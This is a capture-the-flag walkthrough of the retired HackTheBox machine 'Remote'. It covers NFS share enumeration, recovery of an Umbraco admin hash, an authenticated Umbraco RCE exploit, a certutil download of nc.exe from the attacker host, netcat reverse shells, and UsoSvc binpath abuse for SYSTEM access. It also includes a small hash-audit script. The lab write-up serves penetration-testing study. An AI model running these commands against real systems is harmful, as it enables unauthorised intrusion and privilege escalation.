HTB Walkthrough: Remote w/o Metasploit (retired)
Remote is a retired box on HTB and is part of TJ Null's list of OSCP-like boxes.

Hostname: Remote | Difficulty Level: Easy | Operating System: Windows
NMAP Scan
┌──(root💀kali)-[/home/kali/labs/HTB/Remote]
└─# nmap -sC -sV -oA Remote 10.10.10.180
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-26 17:57 EDT
Nmap scan report for 10.10.10.180
Host is up (0.030s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home — Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14m41s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-26T22:13:19
|_ start_date: N/A
Browsing to http://10.10.10.180 shows the site's home page. The contact page at http://10.10.10.180/contact/ reveals that the site uses Umbraco Forms.
┌──(root💀kali)-[/home/kali/labs/HTB/Remote]
└─# sudo gobuster dir -t 50 --url http://10.10.10.180 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/install (Status: 302) [Size: 126] [--> /umbraco/]
/Blog (Status: 200) [Size: 5011]
/about-us (Status: 200) [Size: 5451]
/People (Status: 200) [Size: 6749]
/Product (Status: 500) [Size: 3420]
/INSTALL (Status: 302) [Size: 126] [--> /umbraco/]
From the gobuster results, browsing to http://10.10.10.180/install redirects to http://10.10.10.180/umbraco/#/login. You end up at the same link if you click 'GO TO BACK OFFICE AND INSTALL FORMS' at http://10.10.10.180/contact/.
NFS Enumeration
┌──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
Mount the publicly exported share 'site_backups' on Kali:
On Kali: sudo mkdir /mnt/remote
On Kali: sudo mount -t nfs 10.10.10.180:/site_backups /mnt/remote
Go to /mnt/remote on Kali and browse the contents.
From Web.config, the Umbraco version was found to be 7.12.4.
From the logs, we got two email addresses: admin@htb.local and ssmith@htb.local.
From App_Data/Umbraco.sdf, we get a hint that SHA1 is used for the admin@htb.local password hash:
┌──(kali㉿kali)-[/mnt/remote/App_Data]
└─$ strings Umbraco.sdf | grep "admin"
┌──(kali㉿kali)-[/mnt/remote/App_Data]
└─$ strings Umbraco.sdf | grep "SHA1"
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
The SHA1 hash can be looked up (cracked) with an online hash lookup service. Log in with 'admin@htb.local' and the recovered password at http://10.10.10.180/umbraco.
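As an added example (not part of the original walkthrough), a small Python audit script that parses the strings output above into records and flags accounts stored under a bare, unsalted hash algorithm. The record layout (login, email, digest, algorithm JSON, locale, GUID) is assumed from the three lines shown, and the sample input is constructed from them.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed sample: the three records from the `strings Umbraco.sdf | grep SHA1`
# output above (fields run together: login, email, hex digest, algorithm JSON, locale, GUID).
SAMPLE = """Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f"""

# Assumption: a bare digest with no per-user salt or work factor is treated as weak,
# because it can be recovered from a precomputed lookup table.
WEAK_ALGORITHMS = {"MD5", "SHA1", "SHA256", "SHA512"}

# Anchor on the 40-hex-char SHA1 digest followed by the JSON blob naming the algorithm.
RECORD_RE = re.compile(r'(?P<digest>[0-9a-f]{40})\{"hashAlgorithm":"(?P<algo>[A-Za-z0-9]+)"\}')
# The email after the JSON blob runs straight into the locale ("...localen-US"),
# so the domain is cut at the "en-XX" marker (assumed layout).
EMAIL_RE = re.compile(r"([\w.+-]+@[\w-]+\.[a-z]+?)en-[A-Z]{2}")


@dataclass
class HashRecord:
    email: Optional[str]
    algorithm: str
    digest: str
    weak: bool


def parse_records(text: str) -> List[HashRecord]:
    """Turn the raw strings output into structured records, one per hash blob."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.search(line)
        if not m:
            continue
        email = EMAIL_RE.search(line[m.end():])
        algo = m.group("algo").upper()
        records.append(HashRecord(
            email=email.group(1) if email else None,
            algorithm=algo,
            digest=m.group("digest"),
            weak=algo in WEAK_ALGORITHMS,
        ))
    return records


def weak_accounts(text: str) -> Dict[str, Set[str]]:
    """Group weak-hash accounts by digest; identical digests mean identical passwords and no salt."""
    groups: Dict[str, Set[str]] = {}
    for r in parse_records(text):
        if r.weak:
            groups.setdefault(r.digest, set()).add(r.email or "<no email>")
    return groups
```

Run `weak_accounts(SAMPLE)` to see every account that shares the same lookup-able digest; a salted, iterated scheme would give each record a different digest even for the same password.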
EXPLOITATION
Let us exploit Umbraco using the authenticated RCE exploit found via searchsploit.
┌──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ searchsploit umbraco
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)
┌──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ sudo searchsploit -m aspx/webapps/49488.py
┌──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ cp 49488.py rev2.py
Run the exploit to check that it executes code:
┌──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ sudo python rev2.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c whoami
iis apppool\defaultapppool
You can use the command below to get the user flag:
┌──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ sudo python rev2.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "type C:/Users/Public/user.txt"
Let us get a reverse shell.
Check for the temp folder to upload files to:
┌──(root💀kali)-[/home/kali/labs/HTB/Remote]
└─# sudo python rev2.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "ls C:/Windows/temp"
Upload the nc file:
┌──(root💀kali)-[/home/kali/labs/HTB/Remote]
└─# sudo python rev2.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "certutil -urlcache -split -f http://<Kali IP>:8000/nc.exe C:/Windows/temp/nc.exe"
**** Online ****
0000 …
e800
CertUtil: -URLCache command completed successfully.
The certutil flags used:
-URLCache Display or delete URL cache entries
-split Split embedded ASN.1 element & Save to files
-f Force Overwrite
Open a netcat listener in another tab on port 9877, then execute nc.exe for the reverse shell:
┌──(root💀kali)-[/home/kali/labs/HTB/Remote]
└─# sudo python rev2.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "C:/Windows/temp/nc.exe <Kali IP> 9877 -e powershell.exe"
And you will get a reverse shell and the user flag.
Privilege Escalation
Use the systeminfo command on the target to get OS details. We need to transfer winpeas.exe to the target machine:
PS C:\ftp_transfer> invoke-webrequest -Uri http://<Kali IP>:8000/winpeas.exe -OutFile winpeas.exe
Note: always download the raw version of a file from GitHub.
Running winpeas.exe to enumerate:
PS C:\ftp_transfer> ./winpeas.exe
Interesting enumeration results:
TCP 127.0.0.1 5939 0.0.0.0 0 Listening 3020 TeamViewer_Service
There are two ways to escalate privileges: exploit UsoSvc or TeamViewer.
Let us exploit UsoSvc. A Google search for "exploit usosvc" leads to this reference: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
Open a netcat listener on Kali on port 9002, then run the following on the target machine. (The reference form from PayloadsAllTheThings is sc.exe config UsoSvc binpath= "cmd /c C:\Users\nc.exe 10.10.XX.XX 9988 -e powershell.exe", followed by sc.exe stop UsoSvc and sc.exe start UsoSvc.)
PS C:\Windows\temp> sc.exe config usosvc binpath= "C:\Windows\temp\nc.exe <Kali IP> 9002 -e powershell.exe"
[SC] ChangeServiceConfig SUCCESS
PS C:\Windows\temp> sc.exe stop usosvc
SERVICE_NAME: UsoSvc
TYPE : 30 WIN32
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x3
WAIT_HINT : 0x7530
PS C:\Windows\temp> sc.exe start UsoSvc
And you will get a reverse shell and the root flag.